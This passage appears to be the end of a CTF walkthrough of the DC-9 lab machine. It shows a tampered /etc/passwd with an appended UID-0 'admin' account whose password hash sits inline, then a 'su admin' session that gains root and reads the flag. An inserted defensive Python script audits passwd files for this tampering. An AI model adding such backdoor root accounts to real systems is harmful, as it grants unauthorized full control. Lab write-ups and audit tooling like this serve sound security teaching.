uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash
wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash
fredf@dc-9:/tmp$
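The appended line stands out in three ways a reviewer of /etc/passwd should be checking for: a second UID-0 account besides root, a password hash sitting in the world-readable passwd file instead of an "x" pointing to /etc/shadow, and a UID shared between two names. The auditor below is an added example for this write-up, not part of the original post; SAMPLE_PASSWD is a constructed, abridged copy of the dump above with the appended admin line, and the check generalizes slightly beyond this case by also flagging empty password fields and malformed lines.

```python
"""Audit an /etc/passwd-format file for the tampering shown above.

Added example, not part of the walkthrough.  SAMPLE_PASSWD is a
constructed, abridged copy of the dump in this write-up.
"""
import sys
from collections import Counter

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash
"""


def parse_passwd(text):
    """Split passwd lines into dicts; lines without exactly 7 fields are kept
    and marked malformed rather than dropped, because a damaged line is
    itself a finding."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": n, "name": line, "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": n, "name": name, "pw": pw, "uid": uid, "gid": gid,
                        "gecos": gecos, "home": home, "shell": shell, "malformed": False})
    return entries


def audit_passwd(text):
    """Return (line_no, account, message) tuples for suspicious entries."""
    findings = []
    entries = parse_passwd(text)
    uid_count = Counter(e["uid"] for e in entries if not e["malformed"])
    for e in entries:
        if e["malformed"]:
            findings.append((e["line"], e["name"], "malformed entry (expected 7 fields)"))
            continue
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["line"], e["name"], "UID 0 account other than root"))
        if e["pw"] == "":
            findings.append((e["line"], e["name"], "empty password field (no password required)"))
        elif e["pw"] not in ("x", "*", "!") and not e["pw"].startswith(("!", "*")):
            # A real hash here is readable by every local user and bypasses shadow.
            findings.append((e["line"], e["name"], "password hash stored in passwd instead of shadow"))
        if uid_count[e["uid"]] > 1:
            findings.append((e["line"], e["name"], f"UID {e['uid']} shared with another account"))
    return findings


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_PASSWD
    for line_no, account, msg in audit_passwd(text):
        print(f"line {line_no}: {account}: {msg}")
```

On a live host, run it against /etc/passwd directly; on this box it reports the admin line three times (foreign UID 0, inline hash, shared UID) and root once for the shared UID. A file-integrity baseline of /etc/passwd, /etc/shadow and /etc/sudoers would have raised the same change at write time rather than at the next audit.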
Switch directly to the admin user with su, enter the password, and privilege escalation succeeds
su admin
Password:admin
fredf@dc-9:/tmp$ su admin
Password:
root@dc-9:/tmp# ls
passwd
systemd-private-42e34a0250c047bd905fc4ff0e8e6bb8-apache2.service-TCBHNX
systemd-private-42e34a0250c047bd905fc4ff0e8e6bb8-systemd-timesyncd.service-rXCWSL
root@dc-9:/tmp#
root@dc-9:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-9:/tmp#
root@dc-9:/tmp# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
root@dc-9:~#
The techniques in this article apply only to authorized test environments or legal CTF events. Do not test any system without authorization. The road of security begins with compliance and ends with responsibility.